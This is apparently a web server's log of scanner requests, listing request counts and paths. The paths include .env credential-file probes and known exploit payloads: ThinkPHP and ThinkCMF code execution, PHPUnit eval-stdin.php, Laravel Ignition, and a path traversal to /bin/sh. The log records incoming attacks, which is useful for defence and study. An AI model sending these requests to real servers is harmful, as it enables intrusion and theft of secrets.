1	GET	`/?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000`	HTTP/1.1
1	GET	`/?=PHPE9568F36-D428-11d2-A769-00AA001ACF42`	HTTP/1.1
1	GET	`/?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php>`	HTTP/1.1
1	GET	`/CSS/Miniweb.css`	HTTP/1.1
2	GET	`/HNAP1/`	HTTP/1.1
1	GET	`/HNAP1`	HTTP/1.1
1	GET	`/Portal/Portal.mwsl`	HTTP/1.1
1	GET	`/Portal0000.htm`	HTTP/1.1
1	GET	`/__Additional`	HTTP/1.1
1	GET	`/_ignition/execute-solution`	HTTP/1.1
1	GET	`/admin/.env`	HTTP/1.1
1	GET	`/api/.env`	HTTP/1.1
1	GET	`/app/.env`	HTTP/1.1
1	GET	`/application/.env`	HTTP/1.1
1	GET	`/apps/.env`	HTTP/1.1
1	GET	`/auth/.env`	HTTP/1.1
1	GET	`/back/.env`	HTTP/1.1
1	GET	`/backend/.env`	HTTP/1.1
1	GET	`/base.asp`	HTTP/1.1
1	GET	`/cli/.env`	HTTP/1.1
1	GET	`/config/.env`	HTTP/1.1
1	GET	`/config/getuser?index=0`	HTTP/1.1
1	GET	`/console/`	HTTP/1.1
1	GET	`/core/.env`	HTTP/1.1
1	GET	`/cp/.env`	HTTP/1.1
1	GET	`/dependencies/.env`	HTTP/1.1
1	GET	`/deployment/.env`	HTTP/1.1
1	GET	`/dev/.env`	HTTP/1.1
1	GET	`/development/.env`	HTTP/1.1
1	GET	`/docker/.env`	HTTP/1.1
1	GET	`/docs/cplugError.html/`	HTTP/1.1
1	GET	`/document/.env`	HTTP/1.1
1	GET	`/engine/.env`	HTTP/1.1
3	GET	`/favicon.ico`	HTTP/1.1
1	GET	`/framework/.env`	HTTP/1.1
1	GET	`/frontend/.env`	HTTP/1.1
1	GET	`/index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21`	HTTP/1.1
1	GET	`/index.pl`	HTTP/1.1
1	GET	`/laravel-artisa/.env`	HTTP/1.1
1	GET	`/laravel/.env`	HTTP/1.1
1	GET	`/lbLB`	HTTP/1.1
1	GET	`/local/.env`	HTTP/1.1
1	GET	`/localstart.php`	HTTP/1.1
1	GET	`/login/.env`	HTTP/1.1
1	GET	`/main.cfm`	HTTP/1.1
1	GET	`/main.cgi`	HTTP/1.1
1	GET	`/main.jsa`	HTTP/1.1
1	GET	`/master/.env`	HTTP/1.1
1	GET	`/menu.php`	HTTP/1.1
1	GET	`/nmaplowercheck1643225341`	HTTP/1.1
1	GET	`/personal/.env`	HTTP/1.1
1	GET	`/pools/default/buckets`	HTTP/1.1
1	GET	`/pools`	HTTP/1.1
1	GET	`/private/.env`	HTTP/1.1
1	GET	`/project/.env`	HTTP/1.1
1	GET	`/protected/.env`	HTTP/1.1
1	GET	`/rest/.env`	HTTP/1.1
1	GET	`/search/.env`	HTTP/1.1
1	GET	`/server-status`	HTTP/1.1
1	GET	`/server/.env`	HTTP/1.1
1	GET	`/shared/.env`	HTTP/1.1
1	GET	`/site/.env`	HTTP/1.1
1	GET	`/solr/admin/info/system?wt=json`	HTTP/1.1
1	GET	`/src/.env`	HTTP/1.1
1	GET	`/system/.env`	HTTP/1.1
1	GET	`/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	GET	`/vod_installer/.env`	HTTP/1.1
1	GET	`/vue/.env`	HTTP/1.1
1	GET	`/web/.env`	HTTP/1.1
1	GET	`http[:]//azenv[.]net/`	HTTP/1.1
1	GET	`login.cgi`	HTTP/1.1
1	HEAD	`/`	HTTP/1.1
1	OPTIONS	`/`	HTTP/1.1
1	POST	`//admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	POST	`//api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	POST	`//backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	POST	`//blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	POST	`//cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	POST	`//demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	POST	`//dev/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	POST	`//laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	POST	`//lib/phpunit/Util/PHP/eval-stdin.php`	HTTP/1.1
1	POST	`//lib/phpunit/phpunit/Util/PHP/eval-stdin.php`	HTTP/1.1
1	POST	`//lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	POST	`//lib/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	POST	`//new/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	POST	`//old/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	POST	`//panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	POST	`//phpunit/Util/PHP/eval-stdin.php`	HTTP/1.1
1	POST	`//phpunit/phpunit/Util/PHP/eval-stdin.php`	HTTP/1.1
1	POST	`//phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	POST	`//phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	POST	`//protected/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	POST	`//sites/all/libraries/mailchimp/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	POST	`//vendor/phpunit/Util/PHP/eval-stdin.php`	HTTP/1.1
1	POST	`//vendor/phpunit/phpunit/Util/PHP/eval-stdin.php`	HTTP/1.1
1	POST	`//vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	POST	`//vendor/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	POST	`//wp-content/plugins/cloudflare/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	POST	`//wp-content/plugins/dzs-videogallery/class_parts/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	POST	`//wp-content/plugins/jekyll-exporter/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	POST	`//wp-content/plugins/mm-plugin/inc/vendors/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	POST	`//www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	POST	`/Autodiscover/Autodiscover.xml`	HTTP/1.1
3	POST	`/HNAP1/`	HTTP/1.1
1	POST	`/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh`	HTTP/1.1
1	POST	`/scripts/WPnBr.dll`	HTTP/1.1
1	POST	`/sdk`	HTTP/1.1
1	POST	`/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1